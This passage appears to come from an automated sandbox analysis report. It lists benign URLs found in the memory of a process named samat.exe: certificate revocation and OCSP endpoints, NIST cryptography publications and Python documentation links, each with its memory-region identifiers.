                    Source: samat.exe, 00000008.00000003.4500627948.000001BCCC7F0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3022667291.000001BCCC895000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3022845208.000001BCCC7EF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4559133719.000001BCCC7F1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3022667291.000001BCCC832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577916/
                    Source: samat.exe, 00000008.00000003.4518409392.000001BCCD348000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524395230.000001BCCD342000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4521907829.000001BCCD34D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562686604.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529360624.000001BCCD347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
                    Source: samat.exe, 00000008.00000002.4559686522.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4551934571.000001BCCA50A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: samat.exe, 00000008.00000002.4561597900.000001BCCCAEC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522921844.000001BCCC8C1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4510392887.000001BCCC8BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4537138300.000001BCCC8C6000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
                    Source: samat.exe, 00000008.00000003.4518409392.000001BCCD348000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524395230.000001BCCD342000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4521907829.000001BCCD34D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562686604.000001BCCD347000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529360624.000001BCCD347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
                    Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl
                    Source: samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527305134.000001BCCC8A3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                    Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crlW
                    Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
                    Source: samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527305134.000001BCCC8A3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                    Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crlO
                    Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
                    Source: samat.exe, 00000008.00000002.4559686522.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                    Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                    Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                    Source: samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4520729290.000001BCCCAD5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC834000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561540067.000001BCCCAD7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529948916.000001BCCC84F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529095803.000001BCCC843000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdf
                    Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD427000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
                    Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531671427.000001BCCC990000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527808216.000001BCCC98D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4530017261.000001BCCD41D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514102538.000001BCCC983000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517233682.000001BCCC984000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529696285.000001BCCC990000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
                    Source: samat.exe, 00000008.00000003.4532754927.000001BCCC9FD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513874113.000001BCCC714000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4518791762.000001BCCC718000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4565419860.000001BCCDB6C000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4558325205.000001BCCC719000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4565219957.000001BCCDA30000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4565419860.000001BCCDB60000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4509940106.000001BCCC711000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
                    Source: samat.exe, 00000008.00000002.4565219957.000001BCCDA30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
                    Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/library/itertools.html#recipes
                    Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://foo/bar.tar.gz
                    Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://foo/bar.tgz
                    Source: samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC834000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4559388808.000001BCCC857000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529948916.000001BCCC84F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529095803.000001BCCC843000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                    Source: samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527808216.000001BCCC98D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514102538.000001BCCC983000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517233682.000001BCCC984000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
                    Source: samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC834000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514102538.000001BCCC983000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517233682.000001BCCC984000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
                    Source: samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
                    Source: samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
                    Source: samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.esS
                    Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
